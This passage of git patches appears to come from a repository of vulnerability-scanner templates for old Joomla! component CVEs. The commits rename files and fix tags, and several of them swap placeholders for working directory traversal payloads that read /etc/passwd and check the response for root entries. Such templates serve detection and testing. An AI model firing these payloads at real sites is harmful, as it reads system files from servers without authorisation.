- 200 \ No newline at end of file + - 200 From c60489097db12a84ebd8b30f88165552f85966ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 18:01:53 +0530 Subject: [PATCH 2536/4083] Update CVE-2008-6222.yml --- cves/2008/CVE-2008-6222.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2008/CVE-2008-6222.yml b/cves/2008/CVE-2008-6222.yml index 5e11c820df..6cb7474f10 100644 --- a/cves/2008/CVE-2008-6222.yml +++ b/cves/2008/CVE-2008-6222.yml @@ -5,10 +5,10 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/6980 - https://www.cvedetails.com/cve/CVE-2008-6222 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2008,joomla,lfi requests: - method: GET @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From a771735136d9cea08234b299d8daad229b902857 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 18:02:35 +0530 Subject: [PATCH 2537/4083] Update CVE-2009-1496.yml --- cves/2009/CVE-2009-1496.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2009/CVE-2009-1496.yml b/cves/2009/CVE-2009-1496.yml index 9944f21d49..b915fc3ad0 100644 --- a/cves/2009/CVE-2009-1496.yml +++ b/cves/2009/CVE-2009-1496.yml @@ -5,15 +5,15 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/8367 - https://www.cvedetails.com/cve/CVE-2009-1496 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2009,joomla,lfi requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1" + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" matchers-condition: and matchers: @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 526aced6c22be0b7e138eaedf3fc8789630fa0d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 18:03:20 +0530 Subject: [PATCH 2538/4083] Update and rename CVE-2009-2015.yml to CVE-2009-2015.yaml --- cves/2009/{CVE-2009-2015.yml => CVE-2009-2015.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename cves/2009/{CVE-2009-2015.yml => CVE-2009-2015.yaml} (96%) diff --git a/cves/2009/CVE-2009-2015.yml b/cves/2009/CVE-2009-2015.yaml similarity index 96% rename from cves/2009/CVE-2009-2015.yml rename to cves/2009/CVE-2009-2015.yaml index c311b2f97c..372820389d 100644 --- a/cves/2009/CVE-2009-2015.yml +++ b/cves/2009/CVE-2009-2015.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/8898 - https://www.cvedetails.com/cve/CVE-2009-2015 tags: cve,cve2009,joomla,lfi @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 4a2d65f945e5c43a6467adc1c6563e643315dbdb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 18:36:48 +0530 Subject: [PATCH 2539/4083] updates --- .../{CVE-2007-4504.yml => CVE-2007-4504.yaml} | 0 cves/2008/CVE-2008-4764.yml | 27 ------------------- .../{CVE-2008-6080.yml => CVE-2008-6080.yaml} | 0 .../{CVE-2008-6222.yml => CVE-2008-6222.yaml} | 0 .../{CVE-2009-1496.yml => CVE-2009-1496.yaml} | 0 .../{CVE-2009-2100.yml => CVE-2009-2100.yaml} | 6 ++--- .../{CVE-2009-3053.yml => CVE-2009-3053.yaml} | 6 ++--- .../{CVE-2009-3318.yml => CVE-2009-3318.yaml} | 6 ++--- .../{CVE-2009-4202.yml => CVE-2009-4202.yaml} | 6 ++--- .../{CVE-2009-4679.yml => CVE-2009-4679.yaml} | 4 +-- .../{CVE-2010-0157.yml => CVE-2010-0157.yaml} | 4 +-- .../{CVE-2010-0467.yml => CVE-2010-0467.yaml} | 0 .../{CVE-2010-0696.yml => CVE-2010-0696.yaml} | 4 +-- .../{CVE-2010-0759.yml => CVE-2010-0759.yaml} | 2 +- .../{CVE-2010-0942.yml => CVE-2010-0942.yaml} | 2 +- .../{CVE-2010-0972.yml => CVE-2010-0972.yaml} | 2 +- .../{CVE-2010-0982.yml => CVE-2010-0982.yaml} | 4 +-- .../{CVE-2010-1056.yml => CVE-2010-1056.yaml} | 2 +- .../{CVE-2010-1081.yml => CVE-2010-1081.yaml} | 2 +- .../{CVE-2010-1217.yml => CVE-2010-1217.yaml} | 6 ++--- .../{CVE-2010-1302.yml => CVE-2010-1302.yaml} | 4 +-- .../{CVE-2010-1340.yml => CVE-2010-1340.yaml} | 4 +-- .../{CVE-2010-1461.yml => CVE-2010-1461.yaml} | 0 .../{CVE-2010-1469.yml => CVE-2010-1469.yaml} | 0 .../{CVE-2010-1478.yml => CVE-2010-1478.yaml} | 0 .../{CVE-2010-1491.yml => CVE-2010-1491.yaml} | 2 +- .../{CVE-2010-1540.yml => CVE-2010-1540.yaml} | 0 .../{CVE-2010-1603.yml => CVE-2010-1603.yaml} | 0 .../{CVE-2010-1653.yml => CVE-2010-1653.yaml} | 4 +-- .../{CVE-2010-1658.yml => CVE-2010-1658.yaml} | 2 +- .../{CVE-2010-1715.yml => CVE-2010-1715.yaml} | 4 +-- .../{CVE-2010-1873.yml => CVE-2010-1873.yaml} | 4 +-- .../{CVE-2010-1878.yml => CVE-2010-1878.yaml} | 2 +- cves/2010/CVE-2010-1957.yml | 27 ------------------- .../{CVE-2010-1977.yml => CVE-2010-1977.yaml} | 0 .../{CVE-2010-1982.yml => CVE-2010-1982.yaml} | 3 +-- 36 files changed, 42 insertions(+), 97 deletions(-) rename cves/2007/{CVE-2007-4504.yml => CVE-2007-4504.yaml} (100%) delete mode 100644 cves/2008/CVE-2008-4764.yml rename cves/2008/{CVE-2008-6080.yml => CVE-2008-6080.yaml} (100%) rename cves/2008/{CVE-2008-6222.yml => CVE-2008-6222.yaml} (100%) rename cves/2009/{CVE-2009-1496.yml => CVE-2009-1496.yaml} (100%) rename cves/2009/{CVE-2009-2100.yml => CVE-2009-2100.yaml} (80%) rename cves/2009/{CVE-2009-3053.yml => CVE-2009-3053.yaml} (87%) rename cves/2009/{CVE-2009-3318.yml => CVE-2009-3318.yaml} (87%) rename cves/2009/{CVE-2009-4202.yml => CVE-2009-4202.yaml} (88%) rename cves/2009/{CVE-2009-4679.yml => CVE-2009-4679.yaml} (82%) rename cves/2010/{CVE-2010-0157.yml => CVE-2010-0157.yaml} (89%) rename cves/2010/{CVE-2010-0467.yml => CVE-2010-0467.yaml} (100%) rename cves/2010/{CVE-2010-0696.yml => CVE-2010-0696.yaml} (90%) rename cves/2010/{CVE-2010-0759.yml => CVE-2010-0759.yaml} (96%) rename cves/2010/{CVE-2010-0942.yml => CVE-2010-0942.yaml} (96%) rename cves/2010/{CVE-2010-0972.yml => CVE-2010-0972.yaml} (96%) rename cves/2010/{CVE-2010-0982.yml => CVE-2010-0982.yaml} (91%) rename cves/2010/{CVE-2010-1056.yml => CVE-2010-1056.yaml} (96%) rename cves/2010/{CVE-2010-1081.yml => CVE-2010-1081.yaml} (96%) rename cves/2010/{CVE-2010-1217.yml => CVE-2010-1217.yaml} (70%) rename cves/2010/{CVE-2010-1302.yml => CVE-2010-1302.yaml} (84%) rename cves/2010/{CVE-2010-1340.yml => CVE-2010-1340.yaml} (90%) rename cves/2010/{CVE-2010-1461.yml => CVE-2010-1461.yaml} (100%) rename cves/2010/{CVE-2010-1469.yml => CVE-2010-1469.yaml} (100%) rename cves/2010/{CVE-2010-1478.yml => CVE-2010-1478.yaml} (100%) rename cves/2010/{CVE-2010-1491.yml => CVE-2010-1491.yaml} (96%) rename cves/2010/{CVE-2010-1540.yml => CVE-2010-1540.yaml} (100%) rename cves/2010/{CVE-2010-1603.yml => CVE-2010-1603.yaml} (100%) rename cves/2010/{CVE-2010-1653.yml => CVE-2010-1653.yaml} (87%) rename cves/2010/{CVE-2010-1658.yml => CVE-2010-1658.yaml} (96%) rename cves/2010/{CVE-2010-1715.yml => CVE-2010-1715.yaml} (82%) rename cves/2010/{CVE-2010-1873.yml => CVE-2010-1873.yaml} (83%) rename cves/2010/{CVE-2010-1878.yml => CVE-2010-1878.yaml} (96%) delete mode 100644 cves/2010/CVE-2010-1957.yml rename cves/2010/{CVE-2010-1977.yml => CVE-2010-1977.yaml} (100%) rename cves/2010/{CVE-2010-1982.yml => CVE-2010-1982.yaml} (96%) diff --git a/cves/2007/CVE-2007-4504.yml b/cves/2007/CVE-2007-4504.yaml similarity index 100% rename from cves/2007/CVE-2007-4504.yml rename to cves/2007/CVE-2007-4504.yaml diff --git a/cves/2008/CVE-2008-4764.yml b/cves/2008/CVE-2008-4764.yml deleted file mode 100644 index 309174ce27..0000000000 --- a/cves/2008/CVE-2008-4764.yml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2008-4764 - -info: - name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. - reference: - - https://www.exploit-db.com/exploits/5435 - - https://www.cvedetails.com/cve/CVE-2008-4764 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/cves/2008/CVE-2008-6080.yml b/cves/2008/CVE-2008-6080.yaml similarity index 100% rename from cves/2008/CVE-2008-6080.yml rename to cves/2008/CVE-2008-6080.yaml diff --git a/cves/2008/CVE-2008-6222.yml b/cves/2008/CVE-2008-6222.yaml similarity index 100% rename from cves/2008/CVE-2008-6222.yml rename to cves/2008/CVE-2008-6222.yaml diff --git a/cves/2009/CVE-2009-1496.yml b/cves/2009/CVE-2009-1496.yaml similarity index 100% rename from cves/2009/CVE-2009-1496.yml rename to cves/2009/CVE-2009-1496.yaml diff --git a/cves/2009/CVE-2009-2100.yml b/cves/2009/CVE-2009-2100.yaml similarity index 80% rename from cves/2009/CVE-2009-2100.yml rename to cves/2009/CVE-2009-2100.yaml index ded50fcd6b..db846d97e7 100644 --- a/cves/2009/CVE-2009-2100.yml +++ b/cves/2009/CVE-2009-2100.yaml @@ -5,15 +5,15 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/8946 - https://www.cvedetails.com/cve/CVE-2009-2100 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2009,joomla,lfi requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion= [-LFI-]" + - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2009/CVE-2009-3053.yml b/cves/2009/CVE-2009-3053.yaml similarity index 87% rename from cves/2009/CVE-2009-3053.yml rename to cves/2009/CVE-2009-3053.yaml index 7d8b0146da..3a0a3a1739 100644 --- a/cves/2009/CVE-2009-3053.yml +++ b/cves/2009/CVE-2009-3053.yaml @@ -5,15 +5,15 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/9564 - https://www.cvedetails.com/cve/CVE-2009-3053 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2009,joomla,lfi requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=[-LFI-]" + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2009/CVE-2009-3318.yml b/cves/2009/CVE-2009-3318.yaml similarity index 87% rename from cves/2009/CVE-2009-3318.yml rename to cves/2009/CVE-2009-3318.yaml index 057db7e66e..957a9932a2 100644 --- a/cves/2009/CVE-2009-3318.yml +++ b/cves/2009/CVE-2009-3318.yaml @@ -5,15 +5,15 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/9706 - https://www.cvedetails.com/cve/CVE-2009-3318 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2009,joomla,lfi requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=/../.." + - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2009/CVE-2009-4202.yml b/cves/2009/CVE-2009-4202.yaml similarity index 88% rename from cves/2009/CVE-2009-4202.yml rename to cves/2009/CVE-2009-4202.yaml index c9f6c7d875..33b3f6694d 100644 --- a/cves/2009/CVE-2009-4202.yml +++ b/cves/2009/CVE-2009-4202.yaml @@ -5,15 +5,15 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/8870 - https://www.cvedetails.com/cve/CVE-2009-4202 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2009,joomla,lfi requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=[-LFI-]" + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2009/CVE-2009-4679.yml b/cves/2009/CVE-2009-4679.yaml similarity index 82% rename from cves/2009/CVE-2009-4679.yml rename to cves/2009/CVE-2009-4679.yaml index 5311cefc3c..10596c502d 100644 --- a/cves/2009/CVE-2009-4679.yml +++ b/cves/2009/CVE-2009-4679.yaml @@ -8,12 +8,12 @@ info: reference: | - https://www.exploit-db.com/exploits/33440 - https://www.cvedetails.com/cve/CVE-2009-4679 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2009,joomla,lfi requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=[-LFI-]" + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-0157.yml b/cves/2010/CVE-2010-0157.yaml similarity index 89% rename from cves/2010/CVE-2010-0157.yml rename to cves/2010/CVE-2010-0157.yaml index 022b4550bf..84ce7e02b3 100644 --- a/cves/2010/CVE-2010-0157.yml +++ b/cves/2010/CVE-2010-0157.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/10943 - https://www.cvedetails.com/cve/CVE-2010-0157 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=[-LFI-]" + - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-0467.yml b/cves/2010/CVE-2010-0467.yaml similarity index 100% rename from cves/2010/CVE-2010-0467.yml rename to cves/2010/CVE-2010-0467.yaml diff --git a/cves/2010/CVE-2010-0696.yml b/cves/2010/CVE-2010-0696.yaml similarity index 90% rename from cves/2010/CVE-2010-0696.yml rename to cves/2010/CVE-2010-0696.yaml index db109c5d00..66f1da7c88 100644 --- a/cves/2010/CVE-2010-0696.yml +++ b/cves/2010/CVE-2010-0696.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/11447 - https://www.cvedetails.com/cve/CVE-2010-0696 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php" + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-0759.yml b/cves/2010/CVE-2010-0759.yaml similarity index 96% rename from cves/2010/CVE-2010-0759.yml rename to cves/2010/CVE-2010-0759.yaml index 991d5572b1..93c80ee785 100644 --- a/cves/2010/CVE-2010-0759.yml +++ b/cves/2010/CVE-2010-0759.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/11498 - https://www.cvedetails.com/cve/CVE-2010-0759 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-0942.yml b/cves/2010/CVE-2010-0942.yaml similarity index 96% rename from cves/2010/CVE-2010-0942.yml rename to cves/2010/CVE-2010-0942.yaml index 1470985d87..f5d69afbca 100644 --- a/cves/2010/CVE-2010-0942.yml +++ b/cves/2010/CVE-2010-0942.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11089 - https://www.cvedetails.com/cve/CVE-2010-0942 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-0972.yml b/cves/2010/CVE-2010-0972.yaml similarity index 96% rename from cves/2010/CVE-2010-0972.yml rename to cves/2010/CVE-2010-0972.yaml index 4c761145f4..10db45dc6c 100644 --- a/cves/2010/CVE-2010-0972.yml +++ b/cves/2010/CVE-2010-0972.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11738 - https://www.cvedetails.com/cve/CVE-2010-0972 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-0982.yml b/cves/2010/CVE-2010-0982.yaml similarity index 91% rename from cves/2010/CVE-2010-0982.yml rename to cves/2010/CVE-2010-0982.yaml index 0c398588a0..9fa799d4c8 100644 --- a/cves/2010/CVE-2010-0982.yml +++ b/cves/2010/CVE-2010-0982.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/10942 - https://www.cvedetails.com/cve/CVE-2010-0982 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_cartweberp&controller=[-LFI-]" + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-1056.yml b/cves/2010/CVE-2010-1056.yaml similarity index 96% rename from cves/2010/CVE-2010-1056.yml rename to cves/2010/CVE-2010-1056.yaml index 104d6ccc3d..2049880870 100644 --- a/cves/2010/CVE-2010-1056.yml +++ b/cves/2010/CVE-2010-1056.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11760 - https://www.cvedetails.com/cve/CVE-2010-1056 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1081.yml b/cves/2010/CVE-2010-1081.yaml similarity index 96% rename from cves/2010/CVE-2010-1081.yml rename to cves/2010/CVE-2010-1081.yaml index 4c4670d529..39650b4327 100644 --- a/cves/2010/CVE-2010-1081.yml +++ b/cves/2010/CVE-2010-1081.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11511 - https://www.cvedetails.com/cve/CVE-2010-1081 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1217.yml b/cves/2010/CVE-2010-1217.yaml similarity index 70% rename from cves/2010/CVE-2010-1217.yml rename to cves/2010/CVE-2010-1217.yaml index 0c3d2b0c26..45872b620b 100644 --- a/cves/2010/CVE-2010-1217.yml +++ b/cves/2010/CVE-2010-1217.yaml @@ -4,8 +4,8 @@ info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE: the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. - reference: | + description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + reference: - https://www.exploit-db.com/exploits/11814 - https://www.cvedetails.com/cve/CVE-2010-1217 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_jeformcr&view={LFI}%00" + - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-1302.yml b/cves/2010/CVE-2010-1302.yaml similarity index 84% rename from cves/2010/CVE-2010-1302.yml rename to cves/2010/CVE-2010-1302.yaml index e3e0f264d3..8bf459dd68 100644 --- a/cves/2010/CVE-2010-1302.yml +++ b/cves/2010/CVE-2010-1302.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/11978 - https://www.cvedetails.com/cve/CVE-2010-1302 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_dwgraphs&controller={lfi}%00" + - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-1340.yml b/cves/2010/CVE-2010-1340.yaml similarity index 90% rename from cves/2010/CVE-2010-1340.yml rename to cves/2010/CVE-2010-1340.yaml index 16e7ca875a..d369a9ddb3 100644 --- a/cves/2010/CVE-2010-1340.yml +++ b/cves/2010/CVE-2010-1340.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/33797 - https://www.cvedetails.com/cve/CVE-2010-1340 tags: cve,cve2010,joomla,lfi @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00" + - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" matchers-condition: and matchers: diff --git a/cves/2010/CVE-2010-1461.yml b/cves/2010/CVE-2010-1461.yaml similarity index 100% rename from cves/2010/CVE-2010-1461.yml rename to cves/2010/CVE-2010-1461.yaml diff --git a/cves/2010/CVE-2010-1469.yml b/cves/2010/CVE-2010-1469.yaml similarity index 100% rename from cves/2010/CVE-2010-1469.yml rename to cves/2010/CVE-2010-1469.yaml diff --git a/cves/2010/CVE-2010-1478.yml b/cves/2010/CVE-2010-1478.yaml similarity index 100% rename from cves/2010/CVE-2010-1478.yml rename to cves/2010/CVE-2010-1478.yaml diff --git a/cves/2010/CVE-2010-1491.yml b/cves/2010/CVE-2010-1491.yaml similarity index 96% rename from cves/2010/CVE-2010-1491.yml rename to cves/2010/CVE-2010-1491.yaml index d247b95fe5..865fd5f04f 100644 --- a/cves/2010/CVE-2010-1491.yml +++ b/cves/2010/CVE-2010-1491.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12318 - https://www.cvedetails.com/cve/CVE-2010-1491 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1540.yml b/cves/2010/CVE-2010-1540.yaml similarity index 100% rename from cves/2010/CVE-2010-1540.yml rename to cves/2010/CVE-2010-1540.yaml diff --git a/cves/2010/CVE-2010-1603.yml b/cves/2010/CVE-2010-1603.yaml similarity index 100% rename from cves/2010/CVE-2010-1603.yml rename to cves/2010/CVE-2010-1603.yaml diff --git a/cves/2010/CVE-2010-1653.yml b/cves/2010/CVE-2010-1653.yaml similarity index 87% rename from cves/2010/CVE-2010-1653.yml rename to cves/2010/CVE-2010-1653.yaml index 4313ef2ea4..fdc3e5d2a7 100644 --- a/cves/2010/CVE-2010-1653.yml +++ b/cves/2010/CVE-2010-1653.yaml @@ -4,8 +4,8 @@ info: name: Joomla! Component Graphics 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. - reference: | + description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + reference: - https://www.exploit-db.com/exploits/12430 - https://www.cvedetails.com/cve/CVE-2010-1653 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1658.yml b/cves/2010/CVE-2010-1658.yaml similarity index 96% rename from cves/2010/CVE-2010-1658.yml rename to cves/2010/CVE-2010-1658.yaml index 6ddb4c7fcf..1996fbeb69 100644 --- a/cves/2010/CVE-2010-1658.yml +++ b/cves/2010/CVE-2010-1658.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12427 - https://www.cvedetails.com/cve/CVE-2010-1658 tags: cve,cve2010,joomla,lfi diff --git a/cves/2010/CVE-2010-1715.yml b/cves/2010/CVE-2010-1715.yaml similarity index 82% rename from cves/2010/CVE-2010-1715.yml rename to cves/2010/CVE-2010-1715.yaml index 46d27a2dc0..6eabdff378 100644 --- a/cves/2010/CVE-2010-1715.yml +++ b/cves/2010/CVE-2010-1715.yaml @@ -4,8 +4,8 @@ info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information. - reference: | + description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + reference: - https://www.exploit-db.com/exploits/12174 - 